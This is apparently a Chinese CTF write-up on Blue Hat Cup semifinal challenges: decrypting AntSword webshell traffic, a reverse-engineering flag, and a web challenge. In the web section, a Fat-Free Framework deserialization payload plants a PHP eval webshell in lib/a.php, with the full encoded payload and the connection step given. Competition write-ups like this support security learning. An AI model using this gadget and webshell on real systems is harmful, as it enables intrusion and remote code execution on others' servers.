-
[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)电子取证赛题
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛题【Misc】加密的通道
1、经过wireshark分析发现是蚁剑流量
2、在http请求中有哈希文本
3、尝试几轮后发现是加密的PHP,使用zym解密
参考文章:[Web逆向] PHP解密:zym加密 带乱码调试过程
exp.phpfunction decrypt($data, $key) { $data_1 = ''; for ($i = 0; $i < strlen($data); $i++) { $ch = ord($data[$i]); if ($ch < 245) { if ($ch > 136) { $data_1 .= chr($ch / 2); } else { $data_1 .= $data[$i]; } } } $data_1 = base64_decode($data_1); $key = md5($key); $j = $ctrmax = 32; $data_2 = ''; for ($i = 0; $i < strlen($data_1); $i++) { if ($j <= 0) { $j = $ctrmax; } $j--; $data_2 .= $data_1[$i] ^ $key[$j]; } return $data_2; } function find_data($code) { $code_end = strrpos($code, '?>'); if (!$code_end) { return ""; } $data_start = $code_end + 2; $data = substr($code, $data_start, -46); return $data; } function find_key($code) { // $v1 = $v2('bWQ1'); // $key1 = $v1('??????'); $pos1 = strpos($code, "('" . preg_quote(base64_encode('md5')) . "');"); $pos2 = strrpos(substr($code, 0, $pos1), '$'); $pos3 = strrpos(substr($code, 0, $pos2), '$'); $var_name = substr($code, $pos3, $pos2 - $pos3 - 1); $pos4 = strpos($code, $var_name, $pos1); $pos5 = strpos($code, "('", $pos4); $pos6 = strpos($code, "')", $pos4); $key = substr($code, $pos5 + 2, $pos6 - $pos5 - 2); return $key; } $input_file = $argv[1]; $output_file = $argv[1] . '.decrypted.php'; $code = file_get_contents($input_file); $data = find_data($code); if (!$code) { echo '未找到加密数据', PHP_EOL; exit; } $key = find_key($code); if (!$key) { echo '未找到秘钥', PHP_EOL; exit; } $decrypted = decrypt($data, $key); $uncompressed = gzuncompress($decrypted); // 由于可以不勾选代码压缩的选项,所以这里判断一下是否解压成功,解压失败就是没压缩 if ($uncompressed) { $decrypted = str_rot13($uncompressed); } else { $decrypted = str_rot13($decrypted); } file_put_contents($output_file, $decrypted); echo '解密后文件已写入到 ', $output_file, PHP_EOL;- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
使用
php exp.php decode.php- 1
decode.php为需要解密的文件,得到rsa.php
4、赛后总结发现
貌似直接导出http也是可以的,然后把各个参数丢进去解密输出后第一个参数base64解密后就是flag
flag{844dfc86da23a4d5283907efaf9791ad}
【Reverse】babynim
1、在NimMainModule函数中
2、比对格式、判断长度
3、取中间的36位出来
4、算法就是 flag*e==enc
e=560063927934284409650605943439557376388765529190415191934763442152260285492096 72868995436445345986471 m=517484091195714939273140476977992136412862788940498402288045942239883725017828 94889443165173295123444031074892600769905627166718788675801 print((m//e))- 1
- 2
- 3
- 4
- 5
flag{923973256239481267349126498121231231}
【Web】easyfatfree
1、扫描发现
2、.DS_Store
参考
我不会,所以并没有什么用3、下载源码看看
4、代码审计后发现lib文件夹有写入权限,写反序列化
namespace DB; error_reporting(0); highlight_file(__FILE__); class Jig { const FORMAT_JSON=0, FORMAT_Serialized=1; protected $uuid, $dir, $format, $log, $data, $lazy; function __construct() { $this->lazy=true; $this->data=["/a.php"=>[""]]; $this->format=self::FORMAT_Serialized; $this->dir="lib"; } } echo urlencode(serialize(new Jig())); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
运行结果:
O%3A6%3A%22DB%5CJig%22%3A6%3A%7Bs%3A7%3A%22%00%2A%00uuid%22%3BN%3Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A3%3A%22lib%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A1%3Bs%3A6%3A%22%00%2A%00log%22%3BN%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22%2Fa.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A26%3A%22%3C%3Fphp+eval%28%24_POST%5B%271%27%5D%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D- 1
5、主页payload提交,在lib文件夹下写入一句话
http://xxx.xxx.xxx.xxx:xxxx/?payload=O%3A6%3A%22DB%5CJig%22%3A6%3A%7Bs%3A7%3A%22%00%2A%00uuid%22%3BN%3Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A3%3A%22lib%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A1%3Bs%3A6%3A%22%00%2A%00log%22%3BN%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22%2Fa.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A26%3A%22%3C%3Fphp+eval%28%24_POST%5B%271%27%5D%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D- 1
6、中国蚁剑连接后在根目录下拿到flag
url:
http://xxx.xxx.xxx.xxx:xxxx/lib/a.php- 1
【Forensic】
别问,所有做出来的选择题填空题都是我蒙的,以前没接触过
今后加强学习,下次蓝帽再来了 -
相关阅读:
【乳腺癌诊断】基于聚类和遗传模糊算法乳腺癌(诊断)分析(Matlab代码实现)
知识点7--Docker的容器命令
【计算机网络笔记】网络应用的体系结构
巧用AI玩转时事分析
matlab小车运动轨迹增量式PID控制
javascript创建cookie
EMC RS485接口EMC电路设计方案
linux系统延迟任务
油猴浏览器(安卓)
聊聊JedisFactory
- 原文地址:https://blog.csdn.net/ZXW_NUDT/article/details/126173643
